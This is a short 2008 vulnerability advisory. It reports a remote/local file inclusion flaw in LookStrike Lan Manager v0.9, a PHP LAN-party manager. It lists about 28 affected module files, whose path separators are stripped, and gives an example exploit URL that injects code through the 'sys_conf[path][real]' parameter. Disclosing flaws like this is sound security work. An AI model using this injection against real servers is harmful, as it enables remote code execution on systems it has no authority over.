lookstrike-rfilfi.txt
Posted on 15 February 2008
--==+================================================================================+==-- --==+ LookStrike Lan Manager v0.9 RemoteLocal File Inclusion +==-- --==+================================================================================+==-- Author: MhZ91 Title: LookStrike Lan Manager v0.9 RemoteLocal File Inclusion Download: http://sourceforge.net/project/showfiles.php?group_id=152660 Bug: RemoteLocal File Inclusion Info: LookStrike is a tool written in PHP that manages Lan Party to gain a lot of time about the management of your Lan. You can also gather statistics of your players. LookStrike generate graphics and matches for tournaments automatically. Visit: http://www.inj3ct-it.org [*]---------------------------------------------------------- LookStrike Lan Manager v0.9 present a remotelocal file inclusion vulnerability in this file.. modulesclassTable.php modulesclassdbdb_admins.php modulesclassdbdb_alert.php modulesclassdbdb_double.php modulesclassdbdb_games.php modulesclassdbdb_matches.php modulesclassdbdb_match_teams.php modulesclassdbdb_news.php modulesclassdbdb_platform.php modulesclassdbdb_players.php modulesclassdbdb_server_group.php modulesclassdbdb_server_ip.php modulesclassdbdb_teams.php modulesclassdbdb_team_players.php modulesclassdbdb_tournaments.php modulesclassdbdb_tournament_teams.php modulesclassdbdb_trees.php modulesclass ournamentMatch.php modulesclass ournamentMatchTeam.php modulesclass ournamentRule.php modulesclass ournamentRuleBuilder.php modulesclass ournamentRulePool.php modulesclass ournamentRuleSingle.php modulesclass ournamentRuleTree.php modulesclass ournamentTournament.php modulesclass ournamentTournamentTeam.php modulesclass ournamentTree.php modulesclass ournamentTreeSingle.php all are exploitable by the variable "sys_conf[path][real]" for example http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code] [*]----------------------------------------------------------
